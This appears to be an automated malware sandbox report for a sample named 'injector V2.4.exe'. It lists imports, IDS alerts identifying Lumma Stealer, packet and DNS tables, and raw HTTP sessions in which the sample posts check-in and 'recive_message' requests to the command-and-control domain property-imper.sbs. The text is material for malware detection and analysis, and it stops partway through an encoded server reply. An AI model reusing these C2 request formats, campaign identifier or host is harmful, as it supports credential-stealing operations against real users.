                                                                                  KERNEL32.dllCloseHandle, CompareStringW, CreateFileA, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObjectEx, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                  GDI32.dllCreateEllipticRgn
                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-11-23T14:11:11.838507+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704104.21.33.116443TCP
                                                                                  2024-11-23T14:11:12.545091+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704104.21.33.116443TCP
                                                                                  2024-11-23T14:11:12.545091+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704104.21.33.116443TCP
                                                                                  2024-11-23T14:11:13.918642+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705104.21.33.116443TCP
                                                                                  2024-11-23T14:11:14.660934+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705104.21.33.116443TCP
                                                                                  2024-11-23T14:11:14.660934+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.33.116443TCP
                                                                                  2024-11-23T14:11:16.241595+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.21.33.116443TCP
                                                                                  2024-11-23T14:11:18.324378+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707104.21.33.116443TCP
                                                                                  2024-11-23T14:11:19.090279+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549707104.21.33.116443TCP
                                                                                  2024-11-23T14:11:20.509084+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708104.21.33.116443TCP
                                                                                  2024-11-23T14:11:23.015197+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709104.21.33.116443TCP
                                                                                  2024-11-23T14:11:25.549686+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549711104.21.33.116443TCP
                                                                                  2024-11-23T14:11:25.563296+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549711104.21.33.116443TCP
                                                                                  2024-11-23T14:11:30.110285+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549725104.21.33.116443TCP
                                                                                  2024-11-23T14:11:30.820317+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549725104.21.33.116443TCP
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 23, 2024 14:11:10.523969889 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:10.524050951 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:10.524169922 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:10.525521040 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:10.525553942 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:11.838424921 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:11.838506937 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:11.844907999 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:11.844923019 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:11.845184088 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:11.895762920 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:11.916132927 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:11.916151047 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:11.916279078 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:12.545101881 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:12.545195103 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:12.545283079 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:12.555841923 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:12.555895090 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:12.555926085 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:12.555943012 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:12.606036901 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:12.606128931 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:12.606260061 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:12.606564045 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:12.606600046 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:13.918556929 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:13.918642044 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:13.955070019 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:13.955147028 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:13.955595016 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:13.957875013 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:13.958125114 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:13.958163977 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.660856009 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.660908937 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.660933971 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.660994053 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:14.661041975 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.661098957 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:14.661111116 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.669469118 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.669569016 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:14.669595003 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.678024054 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.678124905 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:14.678149939 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.724023104 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:14.724054098 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.770863056 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:14.780432940 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.833394051 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:14.833417892 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.874795914 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.874841928 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:14.874861956 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.874893904 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.874948978 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:14.875112057 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:14.875133038 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.875149965 CET49705443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:14.875157118 CET44349705104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.978425980 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:14.978483915 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:14.978554964 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:14.978904963 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:14.978921890 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:16.241481066 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:16.241595030 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:16.243429899 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:16.243443966 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:16.243935108 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:16.245203972 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:16.245412111 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:16.245448112 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:16.983494043 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:16.983620882 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:16.983715057 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:16.983844995 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:16.983890057 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:17.110151052 CET49707443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:17.110260963 CET44349707104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:17.110352993 CET49707443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:17.110721111 CET49707443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:17.110750914 CET44349707104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:18.324204922 CET44349707104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:18.324378014 CET49707443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:18.325936079 CET49707443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:18.325970888 CET44349707104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:18.326306105 CET44349707104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:18.327732086 CET49707443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:18.327877045 CET49707443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:18.327922106 CET44349707104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:18.328017950 CET49707443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:18.328030109 CET44349707104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:19.090274096 CET44349707104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:19.090389967 CET44349707104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:19.090471983 CET49707443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:19.090600014 CET49707443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:19.090652943 CET44349707104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:19.286775112 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:19.286873102 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:19.286990881 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:19.287383080 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:19.287434101 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:20.508929014 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:20.509083986 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:20.510653019 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:20.510662079 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:20.510982037 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:20.512238979 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:20.512392044 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:20.512420893 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:20.512501001 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:20.512511015 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:21.393655062 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:21.393996954 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:21.394081116 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:21.394246101 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:21.394278049 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:21.744370937 CET49709443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:21.744416952 CET44349709104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:21.744515896 CET49709443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:21.744903088 CET49709443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:21.744910955 CET44349709104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:23.015083075 CET44349709104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:23.015197039 CET49709443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:23.041630030 CET49709443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:23.041656017 CET44349709104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:23.042638063 CET44349709104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:23.066068888 CET49709443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:23.066188097 CET49709443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:23.066196918 CET44349709104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:23.737355947 CET44349709104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:23.737632990 CET44349709104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:23.737751007 CET49709443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:23.738053083 CET49709443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:23.738078117 CET44349709104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:24.281857967 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:24.281898975 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:24.282037973 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:24.282352924 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:24.282361984 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:25.549583912 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:25.549685955 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.550985098 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.550995111 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:25.551352978 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:25.561743021 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.562479973 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.562552929 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:25.562659025 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.562706947 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:25.562828064 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.563076973 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:25.563241959 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.563271046 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:25.563445091 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.563468933 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:25.563647032 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.563664913 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:25.563678026 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.563715935 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:25.563824892 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.563859940 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.563925028 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:25.564079046 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.564116955 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.564146996 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.611330032 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:25.611552000 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.611618042 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.645874977 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:25.645893097 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:26.100322962 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:28.482755899 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:28.482883930 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:28.482961893 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:28.680243969 CET49711443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:28.680267096 CET44349711104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:28.849461079 CET49725443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:28.849509001 CET44349725104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:28.849575996 CET49725443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:28.849932909 CET49725443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:28.849945068 CET44349725104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:30.110205889 CET44349725104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:30.110285044 CET49725443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:30.111970901 CET49725443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:30.111979008 CET44349725104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:30.112327099 CET44349725104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:30.113660097 CET49725443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:30.113660097 CET49725443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:30.113754034 CET44349725104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:30.820389986 CET44349725104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:30.820725918 CET44349725104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:30.820863008 CET49725443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:30.822063923 CET49725443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:30.822084904 CET44349725104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 14:11:30.822180033 CET49725443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 14:11:30.822185040 CET44349725104.21.33.116192.168.2.5
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 23, 2024 14:11:10.374448061 CET5287353192.168.2.51.1.1.1
                                                                                  Nov 23, 2024 14:11:10.517453909 CET53528731.1.1.1192.168.2.5
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Nov 23, 2024 14:11:10.374448061 CET192.168.2.51.1.1.10xe6eeStandard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Nov 23, 2024 14:11:10.517453909 CET1.1.1.1192.168.2.50xe6eeNo error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                  Nov 23, 2024 14:11:10.517453909 CET1.1.1.1192.168.2.50xe6eeNo error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                  • property-imper.sbs
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.549704104.21.33.1164436564C:\Users\user\Desktop\injector V2.4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-23 13:11:11 UTC265OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 8
                                                                                  Host: property-imper.sbs
                                                                                  2024-11-23 13:11:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                  Data Ascii: act=life
                                                                                  2024-11-23 13:11:12 UTC1017INHTTP/1.1 200 OK
                                                                                  Date: Sat, 23 Nov 2024 13:11:12 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=ap4l6piiepijurc1pgis93um1p; expires=Wed, 19-Mar-2025 06:57:51 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MCzusAGWgoNO7WCvr%2FivWK%2FQ6ZBRdqM6qBdICDtXI4b3o2ePtZIprMejaF1L42zYlSKsGAr3cFifNImcrIWQZXH%2Bzz6NN%2BZkM7sEfEHvnHpctPK3a4t%2FikfQDpEdg7URhd69bfo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e71675cbd3b72a1-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1840&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1602634&cwnd=194&unsent_bytes=0&cid=502275b10d07d6c5&ts=719&x=0"
                                                                                  2024-11-23 13:11:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                  Data Ascii: 2ok
                                                                                  2024-11-23 13:11:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.549705104.21.33.1164436564C:\Users\user\Desktop\injector V2.4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-23 13:11:13 UTC266OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 52
                                                                                  Host: property-imper.sbs
                                                                                  2024-11-23 13:11:13 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 31 32 38 35 30 32 35 37 30 35 26 6a 3d
                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--1285025705&j=
                                                                                  2024-11-23 13:11:14 UTC1021INHTTP/1.1 200 OK
                                                                                  Date: Sat, 23 Nov 2024 13:11:14 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=jug0kigo41mev9pg46i3o319m0; expires=Wed, 19-Mar-2025 06:57:53 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l7bIspwD4LL2jGHaMnGTsvo98v9Crg%2Btuy4UCUbtpCarlwVD6xESFIEK%2BcN8SFq31FIdHT%2FzgZXBrHBSWn8RMhFO%2Fs4tSaqs3P2oC%2BvyyiABznrzBAuf1OK%2B9XfqcxB%2BgKFpP6s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e716769cb99558a-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1483&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=954&delivery_rate=1883870&cwnd=252&unsent_bytes=0&cid=5bda978807108c11&ts=753&x=0"
                                                                                  2024-11-23 13:11:14 UTC348INData Raw: 34 65 31 0d 0a 46 61 7a 73 35 33 77 31 57 43 6d 68 6f 54 4b 56 42 72 34 59 52 37 6f 4b 62 36 79 4c 55 59 68 5a 50 2b 63 48 79 6d 2f 6e 4f 45 64 75 6a 70 72 46 52 67 46 30 43 39 4c 45 45 4b 39 79 7a 47 30 69 6c 69 67 4f 79 4b 6c 72 37 6a 68 54 6c 47 4c 6d 54 5a 46 56 5a 53 2f 4b 6a 59 73 50 55 48 51 4c 78 4e 6b 51 72 31 33 46 4f 69 4c 55 4b 46 57 4f 37 6a 76 71 4f 46 4f 46 5a 71 45 41 6c 31 51 6b 66 63 43 4c 6a 78 6c 57 50 45 6a 4e 7a 46 66 77 59 39 39 79 4b 64 4e 6e 42 38 47 70 66 61 6f 38 52 63 55 39 36 43 4b 43 54 43 5a 59 7a 5a 2b 4d 58 6b 68 30 55 6f 50 45 58 4c 63 38 6e 48 6b 69 32 47 59 4a 79 4f 41 35 34 44 46 62 68 47 4f 67 48 34 35 65 4c 33 33 4f 69 49 34 54 58 79 68 46 78 38 74 63 39 6d 6e 66 4f 6d 75 59 62 78 57 4f 73 58 4f 35 43 56 36 55 64 4c
